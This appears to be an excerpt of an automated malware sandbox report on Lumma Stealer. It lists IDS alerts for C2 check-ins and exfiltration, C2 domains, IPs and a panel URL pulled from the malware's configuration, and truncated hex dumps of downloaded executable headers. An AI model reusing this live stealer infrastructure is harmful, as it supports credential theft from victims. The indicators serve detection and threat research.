Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49945 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49916 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49927 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49927 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49985 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49985 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49994 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49994 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50020 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50033 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50033 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50035 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50035 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50062 -> 104.21.95.91:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50052 -> 104.21.95.91:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: crisiwarny.store
Source: Malware configuration extractor	URLs: scriptyprefej.store
Source: Malware configuration extractor	URLs: navygenerayk.store
Source: Malware configuration extractor	URLs: necklacedmny.store
Source: Malware configuration extractor	URLs: presticitpo.store
Source: Malware configuration extractor	URLs: thumbystriw.store
Source: Malware configuration extractor	URLs: fadehairucw.store
Source: Malware configuration extractor	URLs: founpiuer.store
Source: Malware configuration extractor	URLs: http://185.215.113.206/e2b1563c6670f193.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:22 GMTContent-Type: application/octet-streamContent-Length: 1887744Last-Modified: Sat, 26 Oct 2024 03:45:05 GMTConnection: keep-aliveETag: "671c65c1-1cce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 86 06 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 92 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 74 61 79 69 72 62 00 c0 19 00 00 e0 30 00 00 b4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6d 6e 6f 77 62 6f 75 00 10 00 00 00 a0 4a 00 00 04 00 00 00 a8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 ac 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:33 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 26 Oct 2024 03:44:58 GMTConnection: keep-aliveETag: "671c65ba-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 39 24 1c 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 20 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 69 00 00 04 00 00 fa 70 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 68 65 62 78 79 7a 72 00 a0 19 00 00 70 4f 00 00 9c 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 7a 61 79 65 78 74 71 00 10 00 00 00 10 69 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 69 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 03:54:45 GMTContent-Type: application/octet-streamContent-Length: 2831360Last-Modified: Sat, 26 Oct 2024 03:26:14 GMTConnection: keep-aliveETag: "671c6156-2b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2b 00 00 04 00 00 41 7d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 6c 6b 6e 67 6d 71 6b 00 e0 2a 00 00 a0 00 00 00 d4 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6a 6d 6e 62 74 70 6e 00 20 00 00 00 80 2b 00 00 04 00 00 00 0e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2b 00 00 22 00 00 00 12 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 03:54:50 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 03:55:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 03:55:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 03:55:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 